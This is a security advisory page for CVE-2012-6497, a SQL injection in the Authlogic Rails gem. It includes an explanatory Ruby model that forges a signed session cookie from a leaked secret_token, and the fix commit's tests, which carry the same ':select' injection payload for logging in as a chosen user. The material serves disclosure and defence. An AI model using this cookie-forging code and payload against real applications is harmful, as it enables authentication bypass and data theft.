VYPR
Moderate severity · NVD Advisory · Published Jan 4, 2013 · Updated Apr 29, 2026

CVE-2012-6497

Description

The Authlogic gem for Ruby on Rails, when used with certain versions before 3.2.10, makes potentially unsafe find_by_id method calls, which might allow remote attackers to conduct CVE-2012-6496 SQL injection attacks via a crafted parameter in environments that have a known secret_token value, as demonstrated by a value contained in secret_token.rb in an open-source product.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authlogic gem < 3.2.10 calls unsafe find_by_id, enabling SQL injection via crafted params when the secret_token is known.

Vulnerability

The Authlogic gem for Ruby on Rails, when run on a Rails release affected by CVE-2012-6496 (before 3.2.10), passes values taken straight from the session to the dynamic finder find_by_id (more precisely find_by_#{klass.primary_key}) without coercing them to a string. Rails dynamic finders of that era treated a trailing Hash argument as finder options, so a Hash carrying a :select key had its value concatenated into the SQL unescaped. In environments where the application's secret_token is known (for example because secret_token.rb was committed to a public repository), a remote attacker can forge a signed session cookie containing such a Hash and turn Authlogic's session lookup into SQL injection [1] [2].

Exploitation

The attacker needs the application's secret_token, because Rails 3.x cookie-store sessions are signed but not encrypted, and that token is the signing key. With it, the attacker serializes a session in which the Authlogic token slot (user_credentials) holds a value of their choosing and the record id slot (user_credentials_id) holds a Hash instead of an integer, signs it, and sends it as the session cookie. Authlogic's persist_by_session then calls find_by_id with that Hash; Rails reads the Hash's :select entry as the column list, so the attacker controls the start of the query and can comment out the rest. The test added by the fix commit shows the payload shape: a select list that returns the victim's row with a persistence_token column forced to the attacker's chosen value, so the token comparison Authlogic performs after the lookup passes and the attacker is logged in as that user. No valid credentials are needed, only the secret_token [3] [4].
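The attack path above, as an added example that is not Authlogic's or Rails' own code: a pure-Ruby model with no Rails and no database. It re-implements the Rails 3.x cookie-session signing (Base64 of Marshal.dump, then "--" and an HMAC-SHA1 hex digest keyed with secret_token) so that a forged session can be built from a known secret, then produces the SQL text a pre-3.2.10 dynamic finder would build from the session's user_credentials_id, once as Authlogic called it before the fix and once with the .to_s coercion from commit 1d57a6c4abe4 (shown in the patch further down this page). The secret value, the users table layout, and the victim id are constructed for the example.

```ruby
require 'openssl'

# Rails 3.x ActiveSupport::MessageVerifier as the cookie store used it:
# Base64(Marshal.dump(session)) + "--" + hex(HMAC-SHA1(secret_token, data)).
# Re-implemented here for the example; not Rails' own code.
class CookieSigner
  def initialize(secret_token)
    @secret = secret_token
  end

  def generate(session_hash)
    data = [Marshal.dump(session_hash)].pack('m0')   # strict base64, no newlines
    "#{data}--#{digest(data)}"
  end

  # Returns the session Hash when the signature matches, nil otherwise.
  def verify(cookie)
    data, sig = cookie.to_s.split('--', 2)
    return nil unless data && sig && secure_compare(sig, digest(data))
    Marshal.load(data.unpack1('m0'))
  end

  private

  def digest(data)
    OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), @secret, data)
  end

  def secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Model of the Rails (< 3.2.10) dynamic-finder behaviour behind CVE-2012-6496:
# a trailing Hash argument to find_by_id is taken as finder options, so its
# :select value is spliced into the query unescaped while the id itself is lost.
# Only the SQL string is produced; nothing is executed.
module DynamicFinder
  module_function

  def find_by_id_sql(arg)
    if arg.is_a?(Hash)                                   # extract_options! path
      select = arg[:select] || 'users.*'
      "SELECT #{select} FROM users WHERE users.id IS NULL LIMIT 1"
    else                                                 # normal, quoted path
      "SELECT users.* FROM users WHERE users.id = #{quote(arg)} LIMIT 1"
    end
  end

  def quote(value)
    value.is_a?(Integer) ? value.to_s : "'#{value.to_s.gsub("'", "''")}'"
  end
end

# Authlogic's persist_by_session lookup before the fix ...
def vulnerable_lookup_sql(session)
  DynamicFinder.find_by_id_sql(session['user_credentials_id'])
end

# ... and after commit 1d57a6c4abe4 added .to_s to the record id.
def fixed_lookup_sql(session)
  DynamicFinder.find_by_id_sql(session['user_credentials_id'].to_s)
end

# Payload with the shape of the test added in the fix commit: the injected
# select list returns the victim's row with persistence_token forced to the
# value also placed in session["user_credentials"], so Authlogic's token
# comparison after the lookup passes and the attacker is logged in as victim_id.
def forge_authlogic_cookie(secret_token, victim_id)
  session = {
    'user_credentials'    => 'neo',
    'user_credentials_id' => { select: " *,'neo' AS persistence_token FROM users WHERE id = #{Integer(victim_id)} limit 1 -- " },
  }
  CookieSigner.new(secret_token).generate(session)
end

LEAKED_SECRET = 'example-secret_token-from-a-public-secret_token.rb'   # constructed for this example

def demo(secret_token = LEAKED_SECRET, victim_id = 1)
  cookie  = forge_authlogic_cookie(secret_token, victim_id)
  session = CookieSigner.new(secret_token).verify(cookie)
  {
    forged_cookie_accepted:         !session.nil?,
    vulnerable_sql:                 session && vulnerable_lookup_sql(session),
    fixed_sql:                      session && fixed_lookup_sql(session),
    rejected_after_secret_rotation: CookieSigner.new('a-new-secret_token').verify(cookie).nil?,
  }
end

if __FILE__ == $PROGRAM_NAME
  demo.each { |k, v| puts "#{k}: #{v}" }
end
```

Run it and compare the two SQL strings: the vulnerable one begins with the attacker's select list and ends in a comment that swallows the real WHERE clause, while the fixed one compares users.id against the Hash's string form as a quoted literal, so the payload is inert. The last key shows why rotating a leaked secret_token matters on its own: the same cookie fails verification under a new key, independent of the gem upgrade.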

Impact

A successful attack injects attacker-controlled text into the SELECT clause of the user lookup that Authlogic runs on every request carrying a session. The immediate consequence, the one the fix commit's test guards against, is authentication bypass: the attacker is logged in as any user whose id they choose, without a password. The same injection point can also be used to pull data the attacker should not see out of the database, and depending on the database in use a stronger payload may be able to do more than read [1] [2].

Mitigation

The fix commit (1d57a6c4abe4, Dec 28, 2012) coerces both the record id and the persistence token to strings with to_s before they reach the finder, so a Hash smuggled in through the session can no longer be interpreted as finder options; per the affected-packages data on this page, Authlogic 3.3.0 and later contain it. Note that the version number in the NVD description, 3.2.10, is the Rails release that fixed the underlying dynamic-finder issue CVE-2012-6496, not an Authlogic version, so Rails should be upgraded to 3.2.10 (or the equivalent fix release for the 3.0 and 3.1 series) as well. Independently of the gem upgrade, any secret_token that has been published, for instance in a committed secret_token.rb, must be rotated, since a known signing secret lets an attacker forge any session content [1] [4].

AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                Affected versions   Patched versions
authlogic (RubyGems)   < 3.3.0             3.3.0

Patches

1d57a6c4abe4

Fix session persistence sql vulnerabilities

https://github.com/binarylogic/authlogic · Tieg Zaharia · Dec 28, 2012 · via ghsa
2 files changed · +20 −2
  • lib/authlogic/session/session.rb (+2 −2, modified)
    @@ -35,8 +35,8 @@ def persist_by_session
                   # Allow finding by persistence token, because when records are created the session is maintained in a before_save, when there is no id.
                   # This is done for performance reasons and to save on queries.
                   record = record_id.nil? ?
    -                search_for_record("find_by_persistence_token", persistence_token) :
    -                search_for_record("find_by_#{klass.primary_key}", record_id)
    +                search_for_record("find_by_persistence_token", persistence_token.to_s) :
    +                search_for_record("find_by_#{klass.primary_key}", record_id.to_s)
                   self.unauthorized_record = record if record && record.persistence_token == persistence_token
                   valid?
                 else
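Review bot: the `.to_s` on `record_id` and `persistence_token` is the whole defence here, but the hunk leaves no comment saying why it exists; a one-liner noting that a Hash passed to `find_by_*` is treated as finder options (the `:select` injection this fixes) would stop a later cleanup from dropping what looks like a redundant coercion. Also, the comparison on the following line, `record.persistence_token == persistence_token`, still uses the raw session value rather than the coerced one; it is safe today because a String never equals a Hash, but coercing once into locals (`token = persistence_token.to_s`) and using those in both the lookup and the comparison keeps the two paths from diverging. Finally, coercing silently means a tampered session still produces a query against an id such as `{:select=>...}` instead of being rejected; consider treating a non-String, non-Integer `record_id` as invalid and clearing the session.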
    
  • test/session_test/session_test.rb (+18 −0, modified)
    @@ -20,6 +20,24 @@ def test_persist_persist_by_session
             assert_equal ben, session.record
             assert_equal ben.persistence_token, controller.session["user_credentials"]
           end
    +
    +      def test_persist_persist_by_session_with_session_fixation_attack
    +        ben = users(:ben)
    +        controller.session["user_credentials"] = 'neo'
    +        controller.session["user_credentials_id"] = {:select => " *,'neo' AS persistence_token FROM users WHERE id = #{ben.id} limit 1 -- "}
    +        @user_session = UserSession.find
    +        assert @user_session.blank?
    +      end
    +
    +      def test_persist_persist_by_session_with_sql_injection_attack
    +        ben = users(:ben)
    +        controller.session["user_credentials"] = {:select => "ABRA CADABRA"}
    +        controller.session["user_credentials_id"] = nil
    +        assert_nothing_raised do
    +          @user_session = UserSession.find
    +        end
    +        assert @user_session.blank?
    +      end
           
           def test_persist_persist_by_session_with_token_only
             ben = users(:ben)
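Review bot: both new tests assert only `@user_session.blank?`, which passes whether the injected select was neutralised or the lookup simply found no row; the first test would be stronger if it also asserted that the session did not resolve to `users(:ben)`, the row the payload targets, and the second if it asserted the session values were cleared afterwards. Both payloads are Hashes with a `:select` key; since the defence in the other file is `to_s` rather than a Hash check, one case with an Array or another non-Hash object would document that the coercion is what is relied on. The first test is named session fixation, but what its payload does is log in as a chosen user by id with a forged `persistence_token`, which is an authentication bypass; naming it that way makes the regression it guards against clearer.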
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
